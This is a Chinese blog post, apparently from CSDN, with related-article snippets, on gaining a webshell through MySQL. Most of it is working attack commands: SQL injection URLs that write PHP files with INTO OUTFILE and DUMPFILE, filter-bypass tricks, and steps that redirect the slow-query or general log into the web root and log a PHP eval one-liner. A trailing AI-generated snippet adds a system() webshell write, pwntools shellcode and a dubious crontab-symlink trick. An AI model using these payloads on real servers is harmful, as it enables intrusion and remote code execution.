mysql中getshell的方式

已于 2022-03-17 22:28:17 修改
阅读量5.5k 收藏 26
点赞数 4
CC 4.0 BY-SA版权
分类专栏: Web安全 文章标签: mysql php 数据库
于 2022-03-17 22:28:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/unexpectedthing/article/details/123562645
本文探讨了如何在MySQL中利用OUTFILE和dumpfile进行shell脚本写入,包括联合查询与非联合查询的区别,secure_file_priv权限设置,以及如何利用慢日志和general_log获取shell。同时介绍了binlog的基础知识。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

outfile和dumpfile写shell

利用条件

  1. 数据库当前用户为root权限;
  2. 知道当前网站的绝对路径;
  3. PHPGPC为 off状态;(魔术引号,GET,POST,Cookie)
  4. 写入的那个路径存在写入权限。

基于union联合查询:

?id=1 union select 1,'<?php phpinfo();?>',3 into outfile 'C:\phpstudy\www\shell.php'%23
?id=1 union select 1,'<?php phpinfo();?>',3 into dumpfile 'C:\phpstudy\www\shell.php'%23

非联合查询

当我们无法使用联合查询时,我们可以使用fields terminated bylines terminated by来写shell

?id=1 into outfile 'C:\phpstudy\www\shell.php' FIELDS TERMINATED BY '<?php phpinfo();?>'%23

代替空格的方法

+号,%0a%0b%a0 、 /**/ 注释符等

outfile和dumpfile的区别

outfile:

1、 支持多行数据同时导出

2、 使用union联合查询时,要保证两侧查询的列数相同

3、 会在换行符制表符后面追加反斜杠

4、会在末尾追加换行

dumpfile:

1、 每次只能导出一行数据

2、 不会在换行符制表符后面追加反斜杠

3、 不会在末尾追加换行

因此,我们可以使用into dumpfile这个函数来顺利写入二进制文件;

当然into outfile函数也可以写入二进制文件,但是无法生效(追加的反斜杠会使二进制文件无法生效)

当我们使用dumpfile,应该手动添加 limit 限制,来获取不同的行数

secure_file_prive

MySQL的secure-file-prive参数是用来限制LOAD DATA, SELECT ,OUTFILE, and LOAD_FILE()传到哪个指定目录的。

secure_file_prive= ,结果为空的话,表示允许任何文件读写

secure_file_prive=NULL,表示不允许任何文件读写

secure_file_prive=‘某个路径’,表示这个路径作为文件读写的路径

在mysql5.5版本前,都是默认为空,允许读取

在mysql5.6版本后 ,默认为NULL,并且无法用SQL语句对其进行修改。所以这种只能在配置进行修改。

查询secure_file_prive的参数

show global variables like "%secure%"

利用sql语句修改参数

set global secure_file_prive=

但是5.6后不能利用sql修改了,所以只能利用配置修改

修改value的值:
windows下修改配置文件:mysql.ini
linux修改配置文件:my.cnf

日志getshell

慢日志getshell

慢日志:

一般都是通过long_query_time选项来设置这个时间值,时间以秒为单位,可以精确到微秒。如果查询时间超过了这个时间值(默认为10秒),这个查询语句将被记录到慢查询日志中。查看服务器默认时间值方式如下:

show global variables like '%long_query_time%'
show global variables like '%long%'

查看慢日志参数

show global variables like '%slow%'

image-20220317103023917

对慢日志参数进行修改

set global slow_query_log=1 #打开慢日志
set global slow_query_log_file='c:\\phpstudy\\www\\test.php'#慢日志的路径
注意:一定要用双反斜杠
SELECT '<?php @eval($_POST[1]);?>' or sleep(11)
这儿11是超过慢日志的10秒时间

利用general_log

利用general_log,可以将所有到达mysql服务器的sql语句,都记录下来。

相关参数一共有3个:general_log、log_output、general_log_file

show variables like 'general_log';  -- 查看日志是否开启
set global general_log=on; -- 开启日志功能


show variables like 'general_log_file';  -- 看看日志文件保存位置
set global general_log_file='tmp/general.lg'; -- 设置日志文件保存位置


show variables like 'log_output';  -- 看看日志输出类型  table或file
set global log_output='table'; -- 设置输出类型为 table
set global log_output='file';   -- 设置输出类型为file

一般log_output都是file,就是将日志存入文件中。table的话就是将日志存入数据库的日志表中。

getshell

set global general_log=on
set global general_log_file='需要攻击的路径'
select '<?php eval($_POST[cmd]);?>'

这样就将一句话木马记录到general_log中,从而getshell

binlog的介绍

可以看看这个

sqlmap 连接mysql_sqlmap连接Mysql实现getshell(原创)
weixin_42509793的博客
01-19 2504
前言昨天群友发了一知乎的帖子..才发现sqlmap玩了那么久有些玩意我居然没玩过...然后看着群友玩= =今天也想试试。0x01首先得知道这个玩意,sqlmap -help,不说大家也懂搜嘎.语法为:" DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME" 或者是"DBMS://DATABASE_FILEPATH"。[1]dbms:代表所使用的...
数据库权限提升GetShell
saber的博客
10-21 1194
各类常见数据库提权方式及提权资料文章
MySQL导出一句话拿WebShell的方法
06-19
MySQL导出一句话拿WebShell的方法
Mysql数据库getshell方法
weixin_68408599的博客
04-02 2543
今天摸鱼时候,突然有人问我不同的数据库getshell方式,一时间我想到了mysql还有redis未授权访问到getshell方式,但是仅仅第一时间只想到了这两种,我有查了查资料,找到了上面两种数据库getshell的补充,以及其他数据库getshell方式。因此更新一个专栏,各个数据库getshell方式
MySQL写Shell方法总结
李火火的安全圈
12-31 5050
MySQL注入点,用工具对目标站点写入一句话shell,需要哪些前提条件? **root权限以及网站的绝对路径** outfile 和 dumpfile 写Shell 利用条件 ·数据库当前用户为root权限 ·知道当前网站的绝对路径 ·PHP的GPC为OFF状态;(魔术引号,GET、POST、COOKIE) `写入的那个路径要有写入权限 过滤了单引号into outfile 还可以用吗 不能,GPC要OFF才行,可以测试Hex编码 基于UNION联合查询 ?id=1 UNION ALL SELECT
【sql注入教程】mysql注入直接getshell
dfdhxb995397的博客
08-30 1630
Mysql注入直接getshell的条件相对来说比较苛刻点把 1:要知道网站绝对路径,可以通过报错,phpinfo界面,404界面等一些方式知道 2:gpc没有开启,开启了单引号被转义了,语句就不能正常执行了 3:要有file权限,默认情况下只有root有 4:对目录要有写权限,一般image之类的存放突破的目录就有 在实际环境中我只遇过一次,为了做实验,我把php.ini文件...
关于MySQL的几种getshell
NYG694的博客
02-01 1511
场景介绍:当靶机拥有连接数据库功能时,我们在自己服务器上开启数据库服务,下载脚本用python2运行至于读取什么文件就更改filelist就可以了。
091-从无回显命令执行到getshell的渗透测试.pdf
09-20
6. 利用MySQL进行GetShell:文章中详细描述了如何利用MySQL数据库的用户自定义函数(UDF)进行GetShell。通过查询MySQL的版本和secure_file_priv参数,作者发现可以对数据库进行导入导出操作,于是创建了一个恶意的...
ThinkCMF 任意内容包含getshell漏洞
10-26
ThinkCMF 任意内容包含getshell漏洞 ThinkCMF 是一种基于 PHP+MYSQL 开发的中文字内容管理框架,底层采用 ThinkPHP3.2.3 构建。ThinkCMF 提出灵活的应用机制,框架自身提供基础的管理功能,而开发者可以根据自身的...
phpMyAdmin后台getshell复现
09-18
Getshell指的是在远程服务器上通过各种方式获取webshell,从而获得目标服务器的控制权限。 本教程详细介绍了如何通过phpMyAdmin后台实现getshell复现。首先,需要通过弱口令等方法获得phpMyAdmin的登录权限。一旦...
sql怎么继续编辑已经保存的代码_某团购CMS的GETSHELL操作代码审计
weixin_39673051的博客
12-06 164
作者:会上树的猪合天智汇 0x00 写点废话在渗透测试中,获取一个webshell应该是我们不屑的追求,今天要通过这个CMS从代码的角度看一下可利用的getshell的方法。这一次的代码审计需要借助工具来定位可能存在的漏洞点,选择Seay源代码审计系统。步入正题。0x01文件上传getshell:1、/kindupload.php:通过获取文件最后一个扩展名进行白名单匹配,且添加随...
mysql_getshell的几种方法
carmi的博客
09-12 1874
mysql_getshell 一、mysql的--os-shell 利用原理 --os-shell就是使用udf提权获取WebShell。也是通过into oufile向服务器写入两个文件,一个可以直接执行系统命令,一个进行上传文件。此为sqlmap的一个命令,利用这条命令的先决条件: 要求为数据库DBA,使用--is-dba查看当前网站连接的数据库账号是否为mysql user表中的管理员...
mysql-getshell的几种方法
lza20001103的博客
04-05 572
mysql-getshell的几种方法
mysql数据库拿shell_利用数据库拿shell的一些姿势
weixin_34569317的博客
01-26 2324
0x01、利用MySQL命令导出getshell利用条件:1、拥有网站的写入权限2、Secure_file_priv参数为空或者为指定路径3、知道网站的绝对路径方法:通过into outfile 进行文件写入,写入一句话木马CREATE TABLE shell(cmd text);INSERT INTO shell(cmd) VALUES('');SELECT cmd from shell INT...
phpmyadmin mysql getshell
Abc_Kimball的博客
12-07 216
phpmyadmin mysql getshell 在通过对目标进行信息收集探测后,当发现存有phpmyadmin目录时,进而通过弱口令或者暴力破解进入数据库之后,有多种方法进行getshell 注:大多数集成包里自带,如:phpstudy,wampserver,xampp等 实验环境: Windows(攻机) Windows(靶机)phpstudy集成环境 查看日志路径,可以在变量里搜log查看 也可以用命令语句查看 show variables like '%general%'; into ou
mysql开启慢查询日志_【奇技淫巧】MySql慢查询日志GetShell
weixin_39534208的博客
12-05 193
通过开启慢查询日志,配置可解析文件GETSHELL主要针对日志量庞大,通过日志文件GETSHELL出现问题的情况show select '' from mysql.db where sleep(10);
mysql数据库getshell方式总结
lza20001103的博客
04-05 988
mysql数据库getshell方式总结
phpmyadmin通过日志文件拿webshell
aiquan9342的博客
03-26 538
该方法非原创。只是给大家分享一下姿势。如果知道得就当复习了,不知道得就捣鼓捣鼓。 前提:条件是root用户。 思路:就是利用mysql的一个日志文件。这个日志文件每执行一个sql语句就会将其执行的保存。我们将这个日志文件重命名为我们的shell.php然后执行一条sql带一句话木马的命令。然后执行菜刀连接之! 要先把general log设置为ON 然后将文件修改日志文件名修...
Mysql Getshell总结
热门推荐
qq_51478862的博客
05-05 1万+
获取网站根目录方式 (1) phpinfo() 页面:最理想的情况,直接显示web路径 (2) web报错信息:可以通过各种fuzz尝试让目标报错,也有可能爆出绝对路径 (3) 一些集成的web框架:如果目标站点是利用phpstudy、LAMPP等之类搭建的,可以猜测默认路径或者通过查看数据库保存的路径默认路径 winserver的iis默认路径c:\Inetpub\wwwroot linux的nginx一般是/usr/local/nginx/html,/home/wwwroot/default,/usr.
mysql日志GETSHELL
最新发布
06-09
### 通过MySQL日志获取Shell的方法 在某些情况下,攻击者可以通过利用MySQL的日志文件来获取系统的Shell。这种方法通常依赖于对MySQL服务的权限控制不当或配置错误。以下是可能实现此目标的技术细节: #### 1. 修改MySQL用户为root运行 如果攻击者可以修改MySQL的配置文件(如`/etc/mysql/my.cnf`),他们可以将mysqld服务的运行用户从默认的`mysql`更改为`root`[^2]。例如: ```ini [mysqld] user=root ``` 当mysqld以root权限运行时,任何写入到日志文件的内容都将以root权限执行。攻击者可以利用这一点,在日志中注入恶意命令。 #### 2. 利用MySQL日志注入恶意脚本 MySQL支持多种日志类型,包括查询日志、慢查询日志和二进制日志。攻击者可以通过以下方式向这些日志中注入恶意内容: - **设置日志路径**:通过修改`my.cnf`文件,将日志路径指向一个可执行脚本文件。例如: ```ini general_log = 1 general_log_file = /var/log/mysqld.log ``` - **注入恶意命令**:攻击者可以通过执行SQL语句,将恶意命令写入日志文件。例如: ```sql SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'; ``` #### 3. 执行日志中的命令 如果日志文件被设置为可执行文件(例如通过符号链接),MySQL服务可能会尝试执行其中的内容。例如: ```bash sudo ln -s /var/log/mysqld.log /etc/crontab ``` 上述命令将日志文件链接到`/etc/crontab`,从而导致系统定时任务解析并执行日志中的内容[^1]。 #### 4. 使用pwntools生成Shellcode 在某些场景下,攻击者可以使用pwntools库生成适用于目标环境的shellcode。例如,在64位Linux系统上,可以使用以下代码生成shellcode[^4]: ```python from pwn import * # 生成64位shellcode shellcode = asm(shellcraft.amd64.linux.sh()) print(shellcode) ``` 生成的shellcode可以嵌入到MySQL日志中,通过执行日志文件触发Shell。 #### 5. 导入SQL文件到MySQL 攻击者还可以通过导入包含恶意SQL语句的`.sql`文件来实现相同效果。例如,创建一个包含以下内容的`malicious.sql`文件: ```sql SELECT '<?php system($_GET["cmd"]); ?>' INTO OUTFILE '/var/www/html/shell.php'; ``` 然后通过以下命令将其导入到MySQL数据库中[^5]: ```bash mysql -u root -p < malicious.sql ``` --- ### 注意事项 - 上述方法仅用于安全研究和渗透测试,请勿在未经授权的情况下使用。 - 确保MySQL服务的权限配置正确,避免以root用户运行mysqld服务。 - 定期检查和清理日志文件,防止恶意内容注入。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值